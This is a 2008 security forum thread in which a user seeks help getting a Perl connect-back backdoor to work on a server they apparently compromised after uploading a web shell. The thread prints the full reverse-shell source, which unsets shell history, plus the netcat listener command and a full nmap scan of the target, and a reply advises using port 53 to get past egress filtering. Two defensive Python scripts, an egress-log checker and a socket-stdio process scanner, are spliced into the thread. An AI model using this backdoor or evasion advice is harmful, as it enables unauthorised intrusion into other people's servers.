Waraxe IT Security Portal  
April 19, 2024
www.waraxe.us :: Topic review - Need HELP, perl reverse shell .....
Author Message
hottox
Posted: Sun Nov 23, 2008 3:13 pm    Post subject:

here is some information about the target:

Software: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635. PHP/5.2.6

Code:
System Info: Linux 2.6.27-6_1.intel.BHsmp #1 SMP Thu Nov 13 15:27:29 MST 2008
x86_64
Disabled functions: NONE
cURL: ON
Register globals: OFF
MySQL: ON
MSSQL: OFF
PostgreSQL: ON
Oracle: OFF 

Safe-mode: OFF (not secure)



??????????????????????
waraxe
Posted: Sun Nov 23, 2008 2:35 pm    Post subject:

If you are sure that your PC can be reached from the Internet, then try to use TCP port 53 instead of 2121. Because the webserver needs this port for outgoing DNS requests, it may be usable for your intentions. That's if the target's network-level security is not tighter.
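
Seen from the server operator's side, the reply above is a reason to allow outbound port 53 only towards the host's own resolvers. The following is an added example, not part of the thread: it reviews connection-log lines for egress by web-application accounts. The log format, account names, resolver address and allowlist are all assumptions constructed for illustration.

```python
import ipaddress
import re

# Assumptions (not from the thread): the host's resolver, the accounts that
# run web-application code, and the one backend the web tier needs.
RESOLVERS = {ipaddress.ip_address("192.0.2.53")}
WEB_UIDS = {"apache", "nobody"}
ALLOWED = [(ipaddress.ip_network("192.0.2.16/28"), 5432)]

# Constructed log format: "<timestamp> uid=<user> proto=<p> dst=<ip> dport=<n>"
LINE = re.compile(
    r"uid=(?P<uid>\S+) proto=(?P<proto>tcp|udp) "
    r"dst=(?P<dst>\S+) dport=(?P<dport>\d+)"
)

def classify(line):
    """Return None for expected traffic, else a short finding label."""
    m = LINE.search(line)
    if not m or m["uid"] not in WEB_UIDS:
        return None  # unparsable, or not a web-application account
    dst = ipaddress.ip_address(m["dst"])
    dport = int(m["dport"])
    if dport == 53:
        # DNS is only expected towards the configured resolvers.
        return None if dst in RESOLVERS else "port-53-to-non-resolver"
    if any(dst in net and dport == port for net, port in ALLOWED):
        return None
    return "unexpected-egress"

def findings(lines):
    """Return (label, line) for every line that needs review."""
    out = []
    for line in lines:
        label = classify(line)
        if label:
            out.append((label, line))
    return out

# Constructed sample lines using documentation address ranges.
SAMPLE = [
    "2008-11-23T14:35:02 uid=apache proto=udp dst=192.0.2.53 dport=53",
    "2008-11-23T14:35:09 uid=apache proto=tcp dst=192.0.2.20 dport=5432",
    "2008-11-23T14:36:40 uid=apache proto=tcp dst=203.0.113.7 dport=53",
    "2008-11-23T14:36:41 uid=apache proto=tcp dst=203.0.113.7 dport=2121",
    "2008-11-23T14:37:00 uid=exim proto=tcp dst=198.51.100.25 dport=25",
]

if __name__ == "__main__":
    for label, line in findings(SAMPLE):
        print(f"{label}: {line}")
```

The same allowlist expressed as firewall policy (port 53 only to the resolvers, everything else from web accounts denied by default) removes the gap instead of only reporting it.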
hottox
Posted: Sun Nov 23, 2008 2:28 pm    Post subject:

It's the target's scan,
the port is open, and the firewall is disabled.
waraxe
Posted: Sun Nov 23, 2008 2:14 pm    Post subject:

What computer did you scan? Webserver? I meant your own PC, where NC is in listening mode.

http://www.emule-project.net/home/perl/general.cgi?rm=porttest&tcpport=2121
hottox
Posted: Sun Nov 23, 2008 2:00 pm    Post subject:

Here is the result of an Intense scan, all TCP ports, with nmap:
Code:
PORT      STATE  SERVICE         VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp             PureFTPd
|_ FTP bounce check: no banner
22/tcp    open   ssh             OpenSSH 3.9p1 (protocol 2.0)
25/tcp    open   smtp            Exim smtpd 4.69
26/tcp    open   smtp            Exim smtpd 4.69
53/tcp    closed domain
80/tcp    open   http            Apache httpd 2.2.9 ((Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635)
|_ HTML title: HostMonster - Web hosting
110/tcp   open   pop3            Dovecot pop3d
|_ POP3 Capabilites:  USER CAPA RESP-CODES UIDL PIPELINING STLS TOP SASL(PLAIN)
113/tcp   closed auth
143/tcp   open   imap            Dovecot imapd
443/tcp   open   ssl/http        Apache httpd 2.2.9 ((Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635)
465/tcp   open   ssl/smtp        Exim smtpd 4.69
|_ SSLv2: server still supports SSLv2
993/tcp   open   ssl/imap        Dovecot imapd
|_ SSLv2: server still supports SSLv2
995/tcp   open   ssl/pop3        Dovecot pop3d
|_ SSLv2: server still supports SSLv2
1167/tcp  closed unknown
2077/tcp  open   unknown
2078/tcp  open   ssl/unknown
|_ SSLv2: server still supports SSLv2
2082/tcp  open   http            cPanel httpd 11.23.6
|  HTTP Auth: HTTP Service requires authentication
|_   Auth type: Basic, realm = cPanel
|_ HTML title: cPanel® 11
2083/tcp  open   ssl/http        cPanel httpd 11.23.6
|_ SSLv2: server still supports SSLv2
|_ HTML title: cPanel® 11
|  HTTP Auth: HTTP Service requires authentication
|_   Auth type: Basic, realm = cPanel
2084/tcp  open   http            cPanel EntropyChat httpd 0.2.6
|_ HTML title: Site doesn't have a title.
|_ robots.txt: is empty or has no disallowed entries
2085/tcp  closed unknown
2086/tcp  open   http            cPanel httpd 11.23.6
|_ HTML title: cPanel® 11
|  HTTP Auth: HTTP Service requires authentication
|_   Auth type: Basic, realm = Web Host Manager
2087/tcp  open   ssl/http        cPanel httpd 11.23.6
|_ SSLv2: server still supports SSLv2
|_ HTML title: cPanel® 11
|  HTTP Auth: HTTP Service requires authentication
|_   Auth type: Basic, realm = Web Host Manager
2088/tcp  closed unknown
2089/tcp  closed unknown
2090/tcp  closed unknown
2091/tcp  closed unknown
2092/tcp  closed unknown
2093/tcp  closed unknown
2094/tcp  closed unknown
2095/tcp  open   http            cPanel httpd 11.23.6
|_ HTML title: cPanel® 11
|  HTTP Auth: HTTP Service requires authentication
|_   Auth type: Basic, realm = WebMail
2096/tcp  open   ssl/http        cPanel httpd 11.23.6
|_ SSLv2: server still supports SSLv2
|_ HTML title: cPanel® 11
|  HTTP Auth: HTTP Service requires authentication
|_   Auth type: Basic, realm = WebMail
2097/tcp  closed unknown
6666/tcp  closed irc
8082/tcp  closed blackice-alerts
8083/tcp  closed unknown
8585/tcp  closed unknown
8586/tcp  closed unknown
19638/tcp closed unknown
waraxe
Posted: Sun Nov 23, 2008 1:51 pm    Post subject:

This can be a firewalling issue on the webserver's side. Try common ports like 53, 80, ...
And are you sure that your port 2121 is open on your side? No firewall? No router/NAT in between? Maybe you need a port forward. I suggest running NC in listening mode on your PC and then using some online port scanner to see if your open port is reachable from the Internet.
hottox
Posted: Sun Nov 23, 2008 1:33 pm    Post subject: Need HELP, perl reverse shell .....

Hi everybody,
so, this is my problem: I uploaded a shell on a server, then I uploaded a perl backdoor "chmod 0755",
script:
Code:
#!/usr/bin/perl
use IO::Socket;
#cONNECT BACKDOOR EDITED BY XORON         
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(xoron) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system    = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n";
if ($ARGC!=2) {
  print "Usage: $0 [Host] [Port] \n\n";
  die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==--  \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF


I run netcat:
Code:
nc -vv -l -p 2121

then, via the php shell:
Code:
perl dc.pl [My ip] [port]


and the result: Unable to Connect Host.

I tested the script on the localhost and I had a shell,
I need your help to solve that problem.
Waiting for reply
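
The script in this post duplicates its socket onto STDIN, STDOUT and STDERR before starting `/bin/sh`, so both the interpreter and the shell it spawns end up with all three standard descriptors on one socket. That is something a host owner can look for on Linux. The following is an added example, not part of the thread: it walks `/proc` and reports such processes. The list of watched process names is an assumption.

```python
import os
import re

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")
# Assumption: interpreters and shells worth reviewing on a web host.
WATCHED = {"sh", "bash", "dash", "perl", "python", "php"}

def stdio_socket_inode(fd_targets):
    """Return the socket inode if fds 0, 1 and 2 all point at one socket."""
    inodes = set()
    for fd in ("0", "1", "2"):
        m = SOCKET_LINK.match(fd_targets.get(fd, ""))
        if not m:
            return None  # a tty, pipe, file or closed descriptor
        inodes.add(m.group(1))
    return inodes.pop() if len(inodes) == 1 else None

def scan_proc(root="/proc"):
    """Return sorted (pid, comm, inode) for watched processes with socket stdio."""
    hits = []
    for pid in filter(str.isdigit, os.listdir(root)):
        base = os.path.join(root, pid)
        try:
            with open(os.path.join(base, "comm")) as fh:
                comm = fh.read().strip()
            fd_dir = os.path.join(base, "fd")
            targets = {fd: os.readlink(os.path.join(fd_dir, fd))
                       for fd in os.listdir(fd_dir)}
        except OSError:
            continue  # process exited meanwhile, or is not readable by us
        inode = stdio_socket_inode(targets)
        if comm in WATCHED and inode:
            hits.append((int(pid), comm, inode))
    return sorted(hits)

if __name__ == "__main__":
    for pid, comm, inode in scan_proc():
        print(f"pid={pid} comm={comm} stdio -> socket:[{inode}]")
```

A `socket:[inode]` link does not say whether the socket is TCP or a local UNIX socket, so treat each hit as a lead and look the inode up in `/proc/net/tcp` before concluding anything.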